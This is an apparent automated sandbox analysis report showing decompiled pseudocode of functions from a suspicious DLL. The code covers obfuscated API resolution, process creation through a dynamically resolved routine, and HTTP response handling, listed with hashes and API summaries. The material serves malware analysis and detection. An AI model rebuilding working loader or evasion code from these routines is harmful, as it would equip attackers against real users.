				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100023AB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E10002465(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002350(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100023AB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002447(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                    0x10002248
                    0x10002249
                    0x1000224a
                    0x1000224d
                    0x1000224f
                    0x10002252
                    0x10002253
                    0x10002255
                    0x10002256
                    0x10002257
                    0x1000225a
                    0x10002264
                    0x10002315
                    0x1000231c
                    0x10002325
                    0x1000226a
                    0x1000226a
                    0x10002270
                    0x10002276
                    0x10002279
                    0x1000227c
                    0x10002280
                    0x10002285
                    0x1000228a
                    0x1000230a
                    0x00000000
                    0x1000228c
                    0x1000228c
                    0x10002298
                    0x1000229a
                    0x100022f5
                    0x100022f5
                    0x100022fb
                    0x00000000
                    0x1000229c
                    0x100022ab
                    0x100022ad
                    0x100022ae
                    0x100022af
                    0x100022b2
                    0x100022b2
                    0x100022b4
                    0x00000000
                    0x100022b6
                    0x100022b6
                    0x10002300
                    0x100022b8
                    0x100022b8
                    0x100022bc
                    0x100022c4
                    0x100022c9
                    0x100022ce
                    0x100022da
                    0x100022e2
                    0x100022e9
                    0x100022ef
                    0x100022f3
                    0x00000000
                    0x100022f3
                    0x100022b6
                    0x100022b4
                    0x00000000
                    0x1000229a
                    0x1000230e
                    0x1000230e
                    0x1000230e
                    0x1000228a
                    0x1000232a
                    0x10002331

                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction ID: 00f8ef7e0395215ac697ef11dc5dc8d25bdf0f72b23bf6dca9eab4600a2e2c49
                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                    • Instruction Fuzzy Hash: 7B21C836900204AFD714DF68C8C09ABF7A5FF48390B468568ED569B249DB30FA15C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C81DC Relevance: .1, Instructions: 77COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E010C81DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E010C8347(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E010C8401(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E010C82EC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E010C8347(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E010C83E3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                    0x010c81e0
                    0x010c81e1
                    0x010c81e2
                    0x010c81e5
                    0x010c81e7
                    0x010c81ea
                    0x010c81eb
                    0x010c81ed
                    0x010c81ee
                    0x010c81ef
                    0x010c81f2
                    0x010c81fc
                    0x010c82ad
                    0x010c82b4
                    0x010c82bd
                    0x010c8202
                    0x010c8202
                    0x010c8208
                    0x010c820e
                    0x010c8211
                    0x010c8214
                    0x010c8218
                    0x010c821d
                    0x010c8222
                    0x010c82a2
                    0x00000000
                    0x010c8224
                    0x010c8224
                    0x010c8230
                    0x010c8232
                    0x010c828d
                    0x010c828d
                    0x010c8293
                    0x00000000
                    0x010c8234
                    0x010c8243
                    0x010c8245
                    0x010c8246
                    0x010c8247
                    0x010c824a
                    0x010c824a
                    0x010c824c
                    0x00000000
                    0x010c824e
                    0x010c824e
                    0x010c8298
                    0x010c8250
                    0x010c8250
                    0x010c8254
                    0x010c825c
                    0x010c8261
                    0x010c8266
                    0x010c8272
                    0x010c827a
                    0x010c8281
                    0x010c8287
                    0x010c828b
                    0x00000000
                    0x010c828b
                    0x010c824e
                    0x010c824c
                    0x00000000
                    0x010c8232
                    0x010c82a6
                    0x010c82a6
                    0x010c82a6
                    0x010c8222
                    0x010c82c2
                    0x010c82c9

                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                    • Instruction ID: 14f16fd56205e495f32f2f3ec5f8d48be325015b2877bcba45002199899c7bd0
                    • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                    • Instruction Fuzzy Hash: 5821F1329006059FCB10EF68C8848AFBBA6FF44310B0AC1AED9959B245DB30F915CBE0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C196A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E010C196A(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E010C624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E010C7961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x10ca300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x10ca320; // 0x26dd5a8
					_t18 = _t47 + 0x10cb3e6; // 0x73797325
					_t68 = E010C1E10(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x10ca320; // 0x26dd5a8
						_t19 = _t50 + 0x10cb747; // 0x37a8cef
						_t20 = _t50 + 0x10cb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E010C6381();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E010C6381();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x10ca2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E010C17AB(_t70);
				goto L12;
			}


















                    0x010c1972
                    0x010c1972
                    0x010c1981
                    0x010c198a
                    0x010c198d
                    0x010c1a9a
                    0x010c1aa1
                    0x010c1aa1
                    0x010c199c
                    0x010c19a4
                    0x010c19a9
                    0x010c19ac
                    0x010c19c1
                    0x010c19c7
                    0x010c19c8
                    0x010c19cb
                    0x010c19d1
                    0x010c19d4
                    0x010c19d9
                    0x010c19e1
                    0x010c19ed
                    0x010c19f1
                    0x010c1a81
                    0x010c19f7
                    0x010c19f7
                    0x010c19fc
                    0x010c1a03
                    0x010c1a17
                    0x010c1a1b
                    0x010c1a6a
                    0x010c1a1d
                    0x010c1a1e
                    0x010c1a25
                    0x010c1a3e
                    0x010c1a40
                    0x010c1a44
                    0x010c1a4b
                    0x010c1a65
                    0x010c1a4d
                    0x010c1a56
                    0x010c1a5b
                    0x010c1a5b
                    0x010c1a4b
                    0x010c1a79
                    0x010c1a79
                    0x010c19f1
                    0x010c1a88
                    0x010c1a91
                    0x010c1a95
                    0x00000000

                    APIs
                      • Part of subcall function 010C624F: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,010C1986,?,?,?,?,00000000,00000000), ref: 010C6274
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,7243775A), ref: 010C6296
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,614D775A), ref: 010C62AC
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010C62C2
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010C62D8
                      • Part of subcall function 010C624F: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010C62EE
                    • memset.NTDLL ref: 010C19D4
                      • Part of subcall function 010C1E10: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010C19ED,73797325), ref: 010C1E21
                      • Part of subcall function 010C1E10: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 010C1E3B
                    • GetModuleHandleA.KERNEL32(4E52454B,037A8CEF,73797325), ref: 010C1A0A
                    • GetProcAddress.KERNEL32(00000000), ref: 010C1A11
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C1A79
                      • Part of subcall function 010C6381: GetProcAddress.KERNEL32(36776F57,010C793C), ref: 010C639C
                    • CloseHandle.KERNEL32(00000000,00000001), ref: 010C1A56
                    • CloseHandle.KERNEL32(?), ref: 010C1A5B
                    • GetLastError.KERNEL32(00000001), ref: 010C1A5F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                    • String ID: Ut
                    • API String ID: 3075724336-8415677
                    • Opcode ID: 5f831f4386f8642423da0fb324fb97b8c7b43dd3a2fc6d6cbb9fa0732f529ca8
                    • Instruction ID: 1a406b247439ccde70e696b06564d4771b55ceaee9d3ddd59afcb07c9feff295
                    • Opcode Fuzzy Hash: 5f831f4386f8642423da0fb324fb97b8c7b43dd3a2fc6d6cbb9fa0732f529ca8
                    • Instruction Fuzzy Hash: E9314DB2D00209EFDB20AFA8C888DDEBBF8EB08744F104469F685E3152D7359E448F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C266A Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 43%
                    			E010C266A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x10ca3dc; // 0x37a9c00
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E010C2E72();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E010C2E72();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E010C2F7B(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E010C2F7B(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E010C1289(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x10c918c;
						}
						_t70 = E010C1DDD(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E010C63FD(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x10ca320; // 0x26dd5a8
								_t102 =  *0x10ca134; // 0x10c7ca9
								_t28 = _t105 + 0x10cbb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E010C1289(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x10c9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E010C63FD(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E010C17AB(_v24);
								} else {
									_t92 =  *0x10ca320; // 0x26dd5a8
									_t44 = _t92 + 0x10cbc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E010C17AB(_v8);
						}
						E010C17AB(_v12);
					}
					E010C17AB(_v16);
				}
				return _v28;
			}



































                    0x010c2670
                    0x010c2678
                    0x010c267b
                    0x010c2688
                    0x010c268b
                    0x010c2692
                    0x010c2699
                    0x010c269c
                    0x010c26a9
                    0x010c26ac
                    0x010c26af
                    0x010c26b6
                    0x010c26b9
                    0x010c26c1
                    0x010c26c8
                    0x010c26cb
                    0x010c26d1
                    0x010c26d5
                    0x010c26de
                    0x010c26e2
                    0x010c26e4
                    0x010c26e4
                    0x010c26ec
                    0x010c26f3
                    0x010c26f6
                    0x010c26fc
                    0x010c2703
                    0x010c2714
                    0x010c271b
                    0x010c272d
                    0x010c2734
                    0x010c2737
                    0x010c2740
                    0x010c2749
                    0x010c2752
                    0x010c2768
                    0x010c276d
                    0x010c2771
                    0x010c2775
                    0x010c277c
                    0x010c277f
                    0x010c2781
                    0x010c2781
                    0x010c278b
                    0x010c2794
                    0x010c279b
                    0x010c27b7
                    0x010c27bb
                    0x010c27f4
                    0x010c27bd
                    0x010c27c0
                    0x010c27c8
                    0x010c27d9
                    0x010c27e1
                    0x010c27e9
                    0x010c27ed
                    0x010c27ed
                    0x010c27bb
                    0x010c27fc
                    0x010c27fc
                    0x010c2804
                    0x010c2804
                    0x010c280c
                    0x010c280c
                    0x010c2818

                    APIs
                    • GetTickCount.KERNEL32 ref: 010C2682
                    • lstrlen.KERNEL32(00000000,00000005), ref: 010C2703
                    • lstrlen.KERNEL32(?), ref: 010C2714
                    • lstrlen.KERNEL32(00000000), ref: 010C271B
                    • lstrlenW.KERNEL32(80000002), ref: 010C2722
                    • lstrlen.KERNEL32(?,00000004), ref: 010C278B
                    • lstrlen.KERNEL32(?), ref: 010C2794
                    • lstrlen.KERNEL32(?), ref: 010C279B
                    • lstrlenW.KERNEL32(?), ref: 010C27A2
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlen$CountFreeHeapTick
                    • String ID:
                    • API String ID: 2535036572-0
                    • Opcode ID: c30265e59d676593daad0227a6222e087211c5923d971b1a1f63218bcd45130c
                    • Instruction ID: 88581233ff81254e37e454a86d9ada9ba12199feed0e59541fced6d97790e553
                    • Opcode Fuzzy Hash: c30265e59d676593daad0227a6222e087211c5923d971b1a1f63218bcd45130c
                    • Instruction Fuzzy Hash: 4E518832D0020AEFCF11AFA8CC44ADE7BB5AF44714F058068F944A7251DB368A25DFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C58EE Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C58EE(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E010C63FD(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E010C17AB(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E010C5867( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                    0x010c58ee
                    0x010c58ee
                    0x010c58fe
                    0x010c5901
                    0x010c5905
                    0x010c590d
                    0x010c5910
                    0x010c5929
                    0x010c593d
                    0x010c5944
                    0x010c594b
                    0x010c599e
                    0x010c59a7
                    0x010c59aa
                    0x010c59e5
                    0x010c59eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c59aa
                    0x010c5951
                    0x00000000
                    0x010c5958
                    0x010c5966
                    0x010c5969
                    0x010c596c
                    0x010c5978
                    0x010c597c
                    0x010c59de
                    0x010c597e
                    0x010c5990
                    0x010c59ce
                    0x010c59d9
                    0x010c5992
                    0x010c5995
                    0x010c5999
                    0x010c5999
                    0x010c5990
                    0x00000000
                    0x010c597c
                    0x010c5951
                    0x010c5915
                    0x010c591b
                    0x010c5920
                    0x010c5923
                    0x00000000
                    0x00000000
                    0x00000000
                    0x010c59b3
                    0x010c59bb
                    0x010c59c2
                    0x010c59c2
                    0x00000000

                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 010C5905
                    • SetEvent.KERNEL32(?), ref: 010C5915
                    • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 010C5947
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C596C
                    • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 010C598C
                    • GetLastError.KERNEL32 ref: 010C599E
                      • Part of subcall function 010C5867: WaitForMultipleObjects.KERNEL32(00000002,010C7AF8,00000000,010C7AF8,?,?,?,010C7AF8,0000EA60), ref: 010C5882
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • GetLastError.KERNEL32(00000000), ref: 010C59D3
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                    • String ID:
                    • API String ID: 3369646462-0
                    • Opcode ID: ba944f9d7d0618b59a37ce3891c6aab81ab3b79e7a0d55ef55bc5e3f267b5376
                    • Instruction ID: 321eb85d34014e78b8d40e4604c55fc9397799591cedef0dceb7fabe142f5403
                    • Opcode Fuzzy Hash: ba944f9d7d0618b59a37ce3891c6aab81ab3b79e7a0d55ef55bc5e3f267b5376
                    • Instruction Fuzzy Hash: 16310AB9A00309EFDB21DF99CC819DEBBF8EB09754F1045AEE582A2141D771AA449F50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C4CA7 Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 010C4D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 010C4D17
                    • SysAllocString.OLEAUT32(00000000), ref: 010C4D29
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 010C4DA7
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: b31ae57115d135d0b3497272a55047f60283b23d9c77424307e57e496e2e186e
                    • Instruction ID: db75741a5400faa864e7d78f26affacee4f7bc3dccaa81580ab510711c7f9a11
                    • Opcode Fuzzy Hash: b31ae57115d135d0b3497272a55047f60283b23d9c77424307e57e496e2e186e
                    • Instruction Fuzzy Hash: 89315E32D00609AFDB51EFACC844ADEBBB6BF49704F144469EA50EB110DB759905CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C624F Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E010C63FD(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x10ca320; // 0x26dd5a8
					_t1 = _t23 + 0x10cb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x10ca320; // 0x26dd5a8
					_t2 = _t26 + 0x10cb769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E010C17AB(_t54);
					} else {
						_t30 =  *0x10ca320; // 0x26dd5a8
						_t5 = _t30 + 0x10cb756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x10ca320; // 0x26dd5a8
							_t7 = _t33 + 0x10cb40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x10ca320; // 0x26dd5a8
								_t9 = _t36 + 0x10cb4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x10ca320; // 0x26dd5a8
									_t11 = _t39 + 0x10cb779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E010C462B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                    0x010c625e
                    0x010c6262
                    0x010c6324
